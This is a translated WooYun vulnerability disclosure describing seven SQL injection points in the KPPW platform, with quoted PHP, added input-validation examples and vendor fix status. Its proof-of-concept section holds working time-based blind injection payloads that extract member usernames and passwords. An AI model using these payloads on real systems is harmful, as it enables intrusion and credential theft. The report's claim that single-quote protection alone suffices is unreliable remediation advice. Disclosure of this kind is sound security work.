
Vulnerability Summary

Bug ID: wooyun-2014-086459

Title: KPPW latest version SQL injection vulnerability No. 7 (multiple different injection points)

Vendor: keke.com

Author: xfkxfk

Submitted: 2014-12-10 11:07

Fixed: 2015-03-10 11:08

Disclosed: 2015-03-10 11:08

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org



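Vulnerability Details

Disclosure status:

2014-12-10: Details reported to the vendor, awaiting vendor handling
2014-12-10: Vendor confirmed; details disclosed to the vendor only
2014-12-13: Details opened to third-party security partners
2015-02-03: Details disclosed to core white hats and experts in related fields
2015-02-13: Details disclosed to regular white hats
2015-02-23: Details disclosed to intern white hats
2015-03-10: Details disclosed to the public

Brief description:

KPPW latest version SQL injection vulnerability No. 7 (multiple different injection points)

Detailed description:

KPPW latest version SQL injection vulnerability No. 7, with multiple different injection points.
First SQL injection:
File /control/user/transaction_works.php: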

if($action == 'delete_image'){
    $strSql = sprintf("select file_id,file_name,save_name from %switkey_file where file_id in(%s)",TABLEPRE,$fileid);
    $arrFileInfo = db_factory::get_one($strSql);
    $resText = CommonClass::delFileByFileId($fileid);
    if($resText){
        $array = explode(',', $arrServiceInfo['pic']);
        $newArr = CommonClass::returnNewArr($arrFileInfo['save_name'], $array);
        $_POST['file_ids'] = implode(",", $newArr);
        updateFilepath($arrServiceInfo['service_id'], $_POST['file_ids'], 'pic');
        kekezu::echojson('删除成功',1,array('fileid'=>$fileid,'save_name'=>$arrFileInfo['save_name']));die;
    }
}


Note this line:

$strSql = sprintf("select file_id,file_name,save_name from %switkey_file where file_id in(%s)",TABLEPRE,$fileid);


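$fileid enters the SQL statement without quote protection, which results in an injection.
Second and third SQL injections:
Continue with the next line: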

$resText = CommonClass::delFileByFileId($fileid);


$fileid is then passed into the function delFileByFileId. Following delFileByFileId:
File: /lib/inc/CommonClass.php

public static function delFileByFileId($fileId){
    $strSql = sprintf("select file_id,file_name,save_name from %switkey_file where file_id in(%s)",TABLEPRE,$fileId);
    $arrFileInfo = db_factory::get_one($strSql);
    $filename = S_ROOT.$arrFileInfo['save_name'];
    if(file_exists($filename)){
        unlink($filename);
    }
    return db_factory::execute("delete from ".TABLEPRE."witkey_file where file_id = ".$fileId);
}


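There are two injections here: the $fileid variable goes into both the select and the delete statement without any processing, which results in SQL injection.
Fourth, fifth and sixth SQL injections:
The same problem appears in the file /control/user/transaction_works.php: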

if($action == 'delete_goodsfile'){
    $strSql = sprintf("select file_id,file_name,save_name from %switkey_file where file_id in(%s)",TABLEPRE,$fileid);
    $arrFileInfo = db_factory::get_one($strSql);
    $resText = CommonClass::delFileByFileId($fileid);
    if($resText){
        $array = explode(',', $arrServiceInfo['file_path']);
        $newArr = CommonClass::returnNewArr($arrFileInfo['save_name'], $array);
        $_POST['file_path_2'] = implode(",", $newArr);
        updateFilepath($arrServiceInfo['service_id'], $_POST['file_path_2'], 'file');
        kekezu::echojson('删除成功',1,array('fileid'=>$fileid,'save_name'=>$arrFileInfo['save_name']));die;
    }
}


The problem here is the same as the one analyzed above: it is injectable.
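
For injection points one through six, the value that reaches `in(%s)` and the `delete` statement is meant to be a comma-separated list of numeric file ids, so it can be validated as exactly that before any SQL is built. The following is an added example, not code from KPPW or from the report; `parseFileIdList` and `buildFileSelect` are hypothetical names, and the table prefix `keke_` is taken from the table name in the proof of concept.

```php
<?php
// Added example, not KPPW code. parseFileIdList() and buildFileSelect()
// are hypothetical helper names; 'keke_' stands in for TABLEPRE.

// Return the ids as positive integers, or null when any element of the
// comma-separated list is not a plain decimal number.
function parseFileIdList($raw)
{
    if (!is_string($raw) || $raw === '') {
        return null;
    }
    $ids = array();
    foreach (explode(',', $raw) as $part) {
        $part = trim($part);
        // ctype_digit() accepts digits only, so signs, spaces, quotes,
        // parentheses and comment markers all fail here. Nine digits
        // keeps the value inside a 32-bit signed integer.
        if ($part === '' || strlen($part) > 9 || !ctype_digit($part)) {
            return null;
        }
        $id = (int) $part;
        if ($id < 1) {
            return null;
        }
        $ids[$id] = $id; // keyed by id to drop duplicates
    }
    return array_values($ids);
}

// Build the SELECT from validated integers only.
function buildFileSelect($tablePrefix, array $ids)
{
    return sprintf(
        'select file_id,file_name,save_name from %switkey_file where file_id in(%s)',
        $tablePrefix,
        implode(',', array_map('intval', $ids))
    );
}

// Constructed inputs: one legitimate list, one value that is not a pure id list.
foreach (array('5566,5567', '5566) and 1=1#') as $raw) {
    $ids = parseFileIdList($raw);
    if ($ids === null) {
        echo "rejected: request is refused before any SQL is built\n";
        continue;
    }
    echo buildFileSelect('keke_', $ids), "\n";
}
```

The same validated list would be passed on to delFileByFileId, so its select and delete statements never see the raw request value.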
Seventh SQL injection:
File /control/user/transaction_works.php:

if (isset($formhash)&&kekezu::submitcheck($formhash)) {
    $arrGoodsConfig = unserialize($kekezu->_model_list[6]['config']);
    $goodsprice = floatval($goodsprice);
    $floatMinCash = floatval($arrGoodsConfig['min_cash']);
    if($floatMinCash&&($goodsprice < $floatMinCash)){
        $tips['errors']['goodsprice'] = '最小金额不能少于'.$floatMinCash.'元';
        kekezu::show_msg($tips,null,NULL,NULL,'error');
    }
    if (strtoupper ( CHARSET ) == 'GBK') {
        $goodsname = kekezu::utftogbk($goodsname );
        $goodsdesc = kekezu::utftogbk($goodsdesc );
        $unite_price = kekezu::utftogbk($unite_price );
    }
    $arrData = array(
        'model_id' => $arrServiceInfo['model_id']?$arrServiceInfo['model_id']:6,
        'uid' => $gUid,
        'username' => $gUserInfo['username'],
        'indus_id' => $indus_id,
        'indus_pid' => $indus_pid,
        'title' => $goodsname,
        'price' => $goodsprice,
        'pic' => $file_ids,
        'content' => $goodsdesc,
        'unite_price' => $unite_price,
        'submit_method' => $submit_method,
        'file_path' => $file_path_2,
        'confirm_max' => intval($arrGoodsConfig['confirm_max_day'])
    );
    if(!$pk['service_id']){
        $arrData['profit_rate'] = $arrGoodsConfig['service_profit'];
        $arrData['on_time'] = time();
        $arrData['service_status'] = 2;
    }
    $objServiceT = new keke_table_class ( 'witkey_service' );
    $objServiceT->save ( $arrData,$pk);
    unset($objServiceT);
    if ($objId&&$intTaskId) {
        $strBidSql = ' UPDATE `'.TABLEPRE.'witkey_task_bid` SET `hasdel`=1 WHERE (`bid_id` ='.$objId.') and task_id = '.$intTaskId;
        $strWorkSql = ' UPDATE `'.TABLEPRE.'witkey_task_work` SET `hasdel`=1 WHERE (`work_id`='.$objId.') and task_id = '.$intTaskId;
        db_factory::execute($strBidSql);
        db_factory::execute($strWorkSql);
    }
    kekezu::show_msg('操作成功',$strJumpUrl,NULL,NULL,'ok');
}


Note this line:

$objServiceT->save ( $arrData,$pk);


Here the variable $pk is passed into the save function. Following the save function:
File /lib/inc/keke_table_class.php:

function save($fields, $pk = array()) {
    foreach ( $fields as $k => $v ) {
        $kk = ucfirst ( $k );
        $set_query = "set" . $kk;
        $this->_table_obj->$set_query ( $v );
    }
    $keys = array_keys ( $pk );
    $key = $keys [0];
    //echo $key."\n";
    //print_r($pk);
    //echo $pk[$key];
    if (! empty ( $pk [$key] )) {
        $this->_table_obj->setWhere ( " $key = '" . $pk [$key] . "'" );
        $edit_query = "edit_" . $this->_pre . $this->_table_name;
        $res = $this->_table_obj->$edit_query ();
    } else {
        $create_query = "create_" . $this->_pre . $this->_table_name;
        $res = $this->_table_obj->$create_query ();
    }
    if ($res) {
        return $res;
    } else {
        return false;
    }
}


In the end, the key of $pk goes into the setWhere condition, which results in SQL injection.
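
In save() the value `$pk[$key]` is already wrapped in single quotes, while `$key` is concatenated as a column name, and a column name can only be constrained by comparing it against known names. The following is an added example, not code from KPPW or from the report; `buildPkWhere` and the allow-list are hypothetical, and the sample arrays are constructed.

```php
<?php
// Added example, not KPPW code. buildPkWhere() and the allow-list are
// hypothetical; they show the check save() would need before setWhere().

// Returns a WHERE fragment for an edit, '' for a create (no key value),
// and throws when the request supplies an unexpected column or value.
function buildPkWhere($pk, array $allowedKeys)
{
    if ($pk === null || $pk === array()) {
        return '';
    }
    if (!is_array($pk) || count($pk) !== 1) {
        throw new InvalidArgumentException('pk must hold exactly one column');
    }
    $keys  = array_keys($pk);
    $key   = $keys[0];
    $value = $pk[$key];
    // The column name is compared against fixed strings; quoting cannot
    // make a request-chosen identifier safe.
    if (!in_array($key, $allowedKeys, true)) {
        throw new InvalidArgumentException('unexpected pk column');
    }
    if ($value === '' || $value === null) {
        return '';
    }
    if (!is_scalar($value) || !ctype_digit((string) $value)) {
        throw new InvalidArgumentException('pk value must be a decimal id');
    }
    return sprintf("`%s` = '%d'", $key, (int) $value);
}

$allowed = array('service_id'); // assumed primary key of witkey_service
// Constructed inputs: a normal edit request and a key carrying extra SQL text.
$samples = array(
    array('service_id' => '12'),
    array('service_id=1 and 1=1#' => '222222'),
);
foreach ($samples as $pk) {
    try {
        echo buildPkWhere($pk, $allowed), "\n";
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}
```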

Proof of vulnerability:

First SQL injection:

http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=transaction&op=editwork&action=delete_image&fileid=5566) and 1=if(mid((select concat(username,password) from keke_witkey_member limit 0,1),1,1)=char(97),sleep(5),2)%23


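The response is delayed by 5 seconds, which shows that the first character of UserName is a; continuing in the same way extracts the user information.
Second and third SQL injections: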

http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=transaction&op=editwork&action=delete_image&fileid=5566 and 1=if(mid((select concat(username,password) from keke_witkey_member limit 0,1),1,1)=char(97),sleep(5),2)


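The response is delayed by 5 seconds, which shows that the first character of UserName is a; continuing in the same way extracts the user information.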



Seventh SQL injection:

http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=transaction&op=editwork
formhash=6cb7d4&objId=0&pk%5Bservice_id=1+and+1=if(mid((select concat(username,password) from keke_witkey_member limit 0,1),1,1)=char(97),sleep(5),2)%23%5D=222222&goodsname=111&goodsdesc=111&indus_pid=249&indus_id=-1&upload=&file_ids=&goodsprice=111&unite_price=%E4%B8%AA&submit_method=outside&file_upload_i=&file_path_2=


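The response is delayed by 5 seconds, which shows that the first character of UserName is a; continuing in the same way extracts the user information.

Fix:

Adding single-quote protection is enough.

Copyright notice: when reposting, please credit the source xfkxfk@WooYun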


Vulnerability Response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2014-12-10 17:23

Vendor reply:

Already modified

Latest status:

None

